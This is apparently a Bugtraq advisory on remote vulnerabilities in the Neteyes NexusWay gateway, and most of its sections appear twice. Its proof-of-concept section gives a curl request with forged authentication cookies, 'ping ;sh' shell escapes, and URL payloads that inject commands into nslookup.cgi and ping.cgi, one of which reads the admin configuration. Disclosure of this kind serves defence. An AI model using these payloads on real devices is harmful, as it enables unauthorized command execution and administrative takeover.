Neteyes NexusWay Border Gateway Multiple Remote Vulnerabilities
BID:13596
Info
Neteyes NexusWay Border Gateway Multiple Remote Vulnerabilities
| Bugtraq ID: | 13596 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 11 2005 12:00AM |
| Updated: | May 11 2005 12:00AM |
| Credit: | Discovery is credited to pokley <[email protected]>. |
| Vulnerable: |
Neteyes NexusWay |
| Not Vulnerable: | |
Discussion
Neteyes NexusWay Border Gateway Multiple Remote Vulnerabilities
NexusWay is reportedly affected by multiple remote vulnerabilities. These issues can allow an unauthorized attacker to execute arbitrary commands and gain administrative access to an affected device.
All versions of NexusWay are considered vulnerable at the moment.
NexusWay is reportedly affected by multiple remote vulnerabilities. These issues can allow an unauthorized attacker to execute arbitrary commands and gain administrative access to an affected device.
All versions of NexusWay are considered vulnerable at the moment.
Exploit / POC
Neteyes NexusWay Border Gateway Multiple Remote Vulnerabilities
An exploit is not required.
The following proof of concept is available:
# curl -k -b 'cyclone500_write=1; cyclone500_auth=1;
client_ip1;client=0.0.0.0' https://www.example.com/index.cgi
ping ;sh
traceroute ;sh
https://www.example.com/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin
https://www.example.com/ping.cgi?ip=localhost%26%26touch+/tmp/test
An exploit is not required.
The following proof of concept is available:
# curl -k -b 'cyclone500_write=1; cyclone500_auth=1;
client_ip1;client=0.0.0.0' https://www.example.com/index.cgi
ping ;sh
traceroute ;sh
https://www.example.com/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin
https://www.example.com/ping.cgi?ip=localhost%26%26touch+/tmp/test
Solution / Fix
Neteyes NexusWay Border Gateway Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Neteyes NexusWay Border Gateway Multiple Remote Vulnerabilities
References:
References:
- NexusWay Product Page (Neteyes)
- Neteyes Nexusway multiple vulnerability (pokley
)